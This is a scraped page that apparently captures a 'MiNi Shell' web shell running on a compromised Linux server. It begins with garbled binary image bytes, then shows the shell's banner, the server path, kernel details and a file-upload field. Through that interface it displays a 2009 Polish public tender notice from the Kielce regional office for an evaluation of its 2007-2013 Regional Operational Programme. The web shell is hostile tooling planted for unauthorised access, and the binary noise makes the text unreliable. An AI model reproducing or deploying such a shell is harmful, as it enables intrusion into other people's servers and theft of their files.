JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090326/78900-N-2009.html

<p class="kh_header"><b>Kielce: Przeprowadzenie badania ewaluacyjnego Analiza systemu zarządzania i wdrażania Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 78900 - 2009; data zamieszczenia: 26.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 041 3443347, 3421549, 3421602, faks 041 3445265.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie badania ewaluacyjnego Analiza systemu zarządzania i wdrażania Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy Opis Przedmiotu Zamówienia

1.	Przedmiotem zamówienia jest usługa polegająca na wykonaniu badania ewaluacyjnego  Analiza systemu zarządzania i wdrażania Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013.

2	Celem badania jest 
a)	ocena spójności systemów zarządzania i wdrażania
b)	ocena organizacji pracy w instytucjach zaangażowanych w zarządzanie i wdrażanie programu (podział kompetencji, obszary współpracy, punkty krytyczne, komunikacja wewnętrzna, system kontroli wewnętrznej)
c)	ocena koordynacji działań podejmowanych przez Instytucję Zarządzającą                        w zarządzaniu i wdrażaniu programu
d)	ocena potencjału kadrowego instytucji wchodzących w skład systemu zarządzania i wdrażania RPO WŚ (stan zatrudnienia, fluktuacja, jakość kadr, system motywacyjny, polityka  szkoleniowa)   
e)	ocena adekwatności i użyteczności procedur, stabilność regulacji  
f)	ocena posiadanych zasobów materialnych i niematerialnych systemu zarządzania              i wdrażania w zakresie funkcji  i zadań  pełnionych przez instytucje wchodzące                w skład systemu zarządzania i wdrażania   
g)	ocena zasadności i wysokości ponoszonych kosztów funkcjonowania systemu  zarządzania i wdrażania w ramach pomocy technicznej RPO WŚ        
3.	Badanie będzie  realizowane na poziomie regionalnym (obszar województwa świętokrzyskiego).
4.	Zakres obowiązków Wykonawcy (zgodnie z założeniami Zamawiającego określonymi w Załączniku nr 1 do SIWZ), tj.
Przygotowanie projektu raportu metodologicznego.
Przygotowanie raportu metodologicznego.
Przeprowadzenie badania.
Przygotowanie projektu raportu końcowego.
Przygotowanie raportu końcowego.
Prezentacja wyników badania w siedzibie Zamawiającego.

5.	  Szczegółowy opis zadań składających się na przedmiot zamówienia zawiera Załącznik nr 1 do SIWZ Szczegółowy opis przedmiotu zamówienia.
6.	  Wykonawca zobowiązany będzie przeprowadzać z Zamawiającym na każdym etapie prac objętych przedmiotem zamówienia spotkania przedstawicieli stron (konsultacje merytoryczne ). W takim przypadku Wykonawca zawiadomi Zamawiającego o ww spotkaniach na 2 dni robocze przed planowanym terminem spotkania wraz z podaniem tematu spotkania. 
7.	  Wykonawca zobowiązany będzie do udzielania pełnej informacji na temat postępu i zakresu wykonywanych prac na każde żądanie Zamawiającego lub osoby wskazanej przez Zamawiającego.
8.	  Wykonawca zobowiązany będzie do bezpłatnego przeniesienia majątkowych praw autorskich do wyników badania zawartych w raporcie końcowym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 84.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1.	Spełniają warunki określone w art. 22 ust. 1 pkt 1-3 ustawy, tj. 

1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.:


a)	w okresie ostatnich 3 lat przed wszczęciem postępowania lub w okresie prowadzenia działalności, jeżeli okres ten jest krótszy, wykonali min. 2 usługi polegające na przeprowadzeniu badania ewaluacyjnego w zakresie programu/ów współfinansowanego/ych ze środków Unii Europejskiej, w tym środków przedakcesyjnych i/lub funduszy strukturalnych, których wartość wynosi ponad 45 000 złotych brutto każda 
b)	utworzą do realizacji zamówienia zespół co najmniej 3 osób składający się z:
kierownika zespołu - posiadającego wykształcenie wyższe, który posiada co najmniej 2 lata doświadczenia w prowadzeniu badań ewaluacyjnych programu/ów współfinansowanego/ych ze środków Unii Europejskiej, w tym środków przedakcesyjnych i/lub funduszy strukturalnych oraz posiada doświadczenie w kierowaniu minimum jednym badaniem ewaluacyjnym,
dwóch ekspertów- posiadających wykształcenie wyższe, którzy posiadają co najmniej dwuletnie doświadczenie  w stosowaniu metod i technik prowadzenia badań ewaluacyjnych, doświadczenie  w przeprowadzaniu co najmniej dwóch badań ewaluacyjnych          
3.	Spełniają warunki określone w art. 22 ust. 1 pkt 4 ustawy, tj. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy;
4.	Zamawiający oceni spełnienie warunków udziału w postępowaniu metodą zero - jedynkową, tj. wg zasady spełnia/nie spełnia, na podstawie dokumentów dołączonych do oferty, które zostały wyszczególnione w rozdziale VI SIWZ.
5.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia(w tym spółki cywilne). W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
6.	Do Wykonawców wspólnie ubiegających się o zamówienie publiczne stosuje się przepisy dotyczące Wykonawców, tj. każdy z Wykonawców oddzielnie nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy, a także musi spełnić wymogi, o których mowa w art. 22 ust. 1 ustawy. Dla potwierdzenia spełnienia warunków, o których mowa powyżej, każdy Wykonawca oddzielnie składa oświadczenie i dokumenty wskazane w rozdz. VI ust. 3 lit b i c. SIWZ.Spełnieniem warunku opisanego w pkt 2) a i b niniejszego rozdziału będzie łączne wykazanie się przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczeniami i dokumentami wskazanymi w rozdz. VI ust. 3 lit. a, d, e, f SIWZ oraz łączne wykazanie się dokumentami, o których mowa w rozdz. VI ust. 2 lit a,b, c ,d SIWZ.
7.	W przypadku, gdy oferta złożona przez Wykonawców wspólnie ubiegających się 
o udzielenie zamówienia zostanie uznana przez Zamawiającego za najkorzystniejszą, warunkiem zawarcia umowy jest spełnienie następujących wymagań: 

a)	na żądanie Zamawiającego, Wykonawcy przedłożą umowę wspólnego przedsięwzięcia gospodarczego tzw. umowę konsorcjum;
b)	umowa konsorcjum winna być zawarta na okres realizacji całości zamówienia i nie może być rozwiązana przed upływem terminu realizacji zamówienia;
c)	Wykonawcy występujący wspólnie ponosić będą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy przystępujący do postępowania zobowiązani są do złożenia ofert, składających się z następujących dokumentów:
1.	Wypełnionego Formularza ofertowego - wg wzoru określonego w dodatku nr 1 do SIWZ;
2.	Szczegółowego opisu sposobu realizacji zamówienia, który będzie stanowił dla Zamawiającego podstawę do oceny merytorycznej przedmiotu zamówienia  zawierającego w szczególności:
a) koncepcję badania uzupełnioną o dodatkowe lub zmodyfikowane pytania badawcze
b) szczegółowy opis proponowanej metodologii wraz z uzasadnieniem trafności proponowanych metod i narzędzi badawczych. W przypadku metod interaktywnych
konieczne będzie określenie profilu respondentów, sposobu ich doboru i liczebności próby
c) opis sposobu prezentacji danych wynikających z zrealizowanego zamówienia
d) harmonogram prac z podaniem terminów realizacji poszczególnych etapów badania, osób odpowiedzialnych za ich wykonanie, terminów spotkań konsultacyjnych z Zamawiającym i z przedstawicielami badanych grup.
3.	Dokumentów potwierdzających spełnienie warunków podmiotowych i przedmiotowych udziału w postępowaniu:
a)	oświadczenia o spełnieniu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy - wg wzoru określonego w dodatku nr 2 do SIWZ,
b)	oświadczenia o niepodleganiu wykluczeniu z postępowania, określonych w art. 24 ust. 1 i 2 ustawy - wg wzoru określonego w dodatku nr 3 do SIWZ
c)	aktualnego odpisu z właściwego rejestru albo właściwego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert. W przypadku składania oferty przez Wykonawcę prowadzącego działalność gospodarczą na podstawie wpisu do ewidencji działalności gospodarczej, powyższy warunek spełniać będzie również dokument wystawiony z datą wcześniejszą, przy obligatoryjnym wymogu potwierdzenia w w/w terminie jego aktualności przez organ wydający; 
d)	wykazu wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swym rodzajem i wartością usługom stanowiącym przedmiot zamówienia (zgodnie z rozdz. V pkt 2)  lit a SIWZ), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały zrealizowane należycie -wg wzoru określonego w dodatku nr 4 do SIWZ,
e)	wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia (zgodnie z rozdz. V pkt 2) lit. b SIWZ) niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wg wzoru określonego w dodatku nr 5 do SIWZ,
f)	pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ust. 2 lit. f Wykonawca wskazał osoby, które zostaną udostępnione przez inne podmioty - wg wzoru określonego w dodatku nr 6 do SIWZ.
4.	W przypadku wspólnego ubiegania się przez Wykonawców o udzielenie zamówienia publicznego (w tym spółka cywilna) zobowiązani są przedłożyć pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
5.	W przypadku, gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu o którym mowa w ust. 3 lit c  zobowiązany jest załączyć dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości . Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert.
6.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w ust. 5, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty powinny być wystawione z zachowaniem wymaganych terminów, odpowiednio wg zasad określonych dla dokumentów wymienionych w ust. 5 niniejszego rozdziału.
7.	Zamawiający wymaga, aby załączone do oferty dokumenty sporządzone w języku obcym złożone zostały wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę .
8.	W przypadku braku wymaganych oświadczeń, dokumentów lub pełnomocnictw oraz w przypadku złożenia dokumentów i oświadczeń zawierających błędy lub złożenia wadliwych pełnomocnictw, Zamawiający wezwie Wykonawców do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania.
9.	Zamawiający zastrzega sobie możliwość wezwania Wykonawców do złożenia, w wyznaczonym przez siebie terminie, wyjaśnień dotyczących oświadczeń lub dokumentów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - sposób realizacji przedmiotu zamówienia - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.sejmik.kielce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia jest bezpłatna oraz dostępna jest w siedzibie Zamawiającego AL.IX Wieków KIELC 3, 25-516 KIELCE, pokój nr 344 III piętro Budynek C-2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2009 godzina 11:30, miejsce: siedziba Zamawiajacego AL.IX Wieków KIELC 3, 25-516 KIELCE, pokój nr 146 
I piętro Budynek C-2 ( KANCELARIA OGÓLNA).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com